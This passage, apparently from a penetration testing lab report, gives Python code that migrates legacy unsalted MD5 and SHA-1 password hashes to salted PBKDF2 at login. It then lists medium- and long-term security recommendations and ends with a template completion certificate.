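As an added example of remediating item 2 (not code from the lab or the portal), the following Python replaces the portal's unsalted MD5 and SHA-1 password hashes with salted PBKDF2-HMAC-SHA256, upgrading each legacy hash transparently at the user's next successful login so no one has to be asked for a new password. The stored-hash format, the iteration count and the function names are assumptions.

```python
"""Opportunistic upgrade of legacy password hashes to salted PBKDF2.
Added example, not the portal's code; the storage format is an assumption."""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumption: tune to the login latency budget


def classify_hash(stored: str) -> str:
    """Recognise the legacy formats found in the lab's dump of the users table:
    32 hex chars is an unsalted MD5, 40 hex chars an unsalted SHA-1."""
    if stored.startswith("pbkdf2_sha256$"):
        return "pbkdf2_sha256"
    hexdigits = set("0123456789abcdef")
    if len(stored) == 32 and set(stored) <= hexdigits:
        return "md5_unsalted"
    if len(stored) == 40 and set(stored) <= hexdigits:
        return "sha1_unsalted"
    return "unknown"


def hash_password(password: str, salt: bytes = None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison against either the new or a legacy format."""
    kind = classify_hash(stored)
    if kind == "pbkdf2_sha256":
        _, iters, salt_hex, digest_hex = stored.split("$")
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(digest.hex(), digest_hex)
    if kind == "md5_unsalted":
        return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored)
    if kind == "sha1_unsalted":
        return hmac.compare_digest(hashlib.sha1(password.encode()).hexdigest(), stored)
    return False


def login_and_upgrade(users: dict, username: str, password: str) -> bool:
    """Authenticate; on success rewrite a legacy hash in the new format, since
    the plaintext is available only at this moment."""
    stored = users.get(username)
    if stored is None or not verify_password(password, stored):
        return False
    if classify_hash(stored) != "pbkdf2_sha256":
        users[username] = hash_password(password)
    return True


# Constructed sample mirroring the lab's dump: one MD5 and one SHA-1 entry.
USERS = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "sarah": "8cb2237d0679ca88db6464eac60da96345513964",
}
```

Once every row has been rewritten, the MD5 and SHA-1 branches of verify_password can be removed so the legacy formats are no longer accepted at all.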

Medium-term Recommendations (30-90 days):

  1. Implement network segmentation to limit lateral movement between systems
  2. Deploy a web application firewall (WAF) to protect against common web attacks
  3. Implement a robust password policy requiring complex passwords and multi-factor authentication
  4. Conduct security awareness training for employees, focusing on password security and phishing awareness
  5. Implement centralized logging and monitoring to detect suspicious activities

Long-term Recommendations (90+ days):

  1. Implement a comprehensive vulnerability management program with regular scanning
  2. Conduct penetration tests at least annually to identify new vulnerabilities
  3. Deploy an intrusion detection/prevention system (IDS/IPS)
  4. Develop an incident response plan and conduct regular tabletop exercises
  5. Consider implementing a security information and event management (SIEM) solution

Certificate of Completion

Penetration Testing Lab

This certificate is awarded to

[Your Name Here]

For successfully completing the Penetration Testing Lab and demonstrating proficiency in ethical hacking techniques, vulnerability assessment, and security reporting.

Instructor: Aziz Alghamdi

Date: May 1, 2025